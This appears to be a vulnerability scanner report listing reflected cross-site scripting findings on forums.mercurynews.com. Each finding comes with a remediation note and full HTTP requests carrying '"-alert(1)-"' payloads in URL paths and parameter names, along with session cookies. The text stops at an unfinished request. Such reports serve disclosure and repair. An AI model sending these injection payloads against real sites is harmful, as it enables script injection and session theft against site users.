GET /topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title ...[SNIP]... anguage="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / topic2deab"-alert(1)-"4a706fc981a/oil-and-iran-war"; s.prop9=getCiQueryString("SOURCE"); s.campaign=getCiQueryString("EADID")+getCiQueryString("CREF"); s.events="event1"; s.eVar2=getCiQueryString("SOURCE"); s.eVar4=s.pageName; s ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96781"-alert(1)-"1dccca72dc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-and-iran-war96781"-alert(1)-"1dccca72dc8 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:29 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:53 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22122
1.63. http://forums.mercurynews.com/topic/oil-and-iran-war [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/oil-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 195d3"-alert(1)-"bbdb9078104 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-and-iran-war?195d3"-alert(1)-"bbdb9078104=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:01 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:25 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23342
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bdef6"-alert(1)-"abaffde0a85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicbdef6"-alert(1)-"abaffde0a85/oil-price-and-iran-war HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22134
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b93"-alert(1)-"c1260fb02e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-warb7b93"-alert(1)-"c1260fb02e0 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:14 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:38 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22134
1.66. http://forums.mercurynews.com/topic/oil-price-and-iran-war [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/oil-price-and-iran-war
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 363f2"-alert(1)-"de8dec15453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/oil-price-and-iran-war?363f2"-alert(1)-"de8dec15453=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:59 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:23 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 98092
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe5e4"-alert(1)-"7be3daf7363 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topicfe5e4"-alert(1)-"7be3daf7363/pentagon-cant-explain-missile-off-california HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:09 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:33 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64259"-alert(1)-"06154ffc603 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california64259"-alert(1)-"06154ffc603 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:22 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:46 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22178
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab401"-alert(1)-"0432824b438 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/pentagon-cant-explain-missile-off-california?ab401"-alert(1)-"0432824b438=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:03 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:27 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 19412
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4a7"-alert(1)-"28a781fd586 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic8d4a7"-alert(1)-"28a781fd586/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:58 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:22 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22218
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e3d4"-alert(1)-"47d584067f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy1e3d4"-alert(1)-"47d584067f5 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:07 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:31 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22218
1.72. http://forums.mercurynews.com/topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20852"-alert(1)-"14a59680a3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/supreme-court-wont-halt-enforcement-of-dont-ask-dont-tell-policy?20852"-alert(1)-"14a59680a3a=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:06:54 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:18 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 23285
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a503"-alert(1)-"208a5264286 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic4a503"-alert(1)-"208a5264286/war-crisis-in-september HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:27 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:51 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22136
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b33de"-alert(1)-"add33b46077 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-septemberb33de"-alert(1)-"add33b46077 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:33 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:57 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22136
1.75. http://forums.mercurynews.com/topic/war-crisis-in-september [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/topic/war-crisis-in-september
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57abb"-alert(1)-"ea4b545c8c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic/war-crisis-in-september?57abb"-alert(1)-"ea4b545c8c0=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:07:18 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:42 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 162532
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34def"-alert(1)-"a6f704bab09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml34def"-alert(1)-"a6f704bab09/comments HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:26 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:50 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22102
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df349"-alert(1)-"078e172cde1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/commentsdf349"-alert(1)-"078e172cde1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:40 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:04 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22102
1.78. http://forums.mercurynews.com/xml/comments [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://forums.mercurynews.com
Path:
/xml/comments
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c1a8b"-alert(1)-"d726d012b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml/comments?c1a8b"-alert(1)-"d726d012b6=1 HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:19 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:43 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2ff9b"-alert(1)-"3afa300d7b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /xml2ff9b"-alert(1)-"3afa300d7b5/poll-link HTTP/1.1 Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb27b49a326af87a923=c6904e1d744ab22a8dce30fd2e5d7e63; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116-1289775685507;
Response
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:46 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22104
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4083"-alert(1)-"6c029440ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
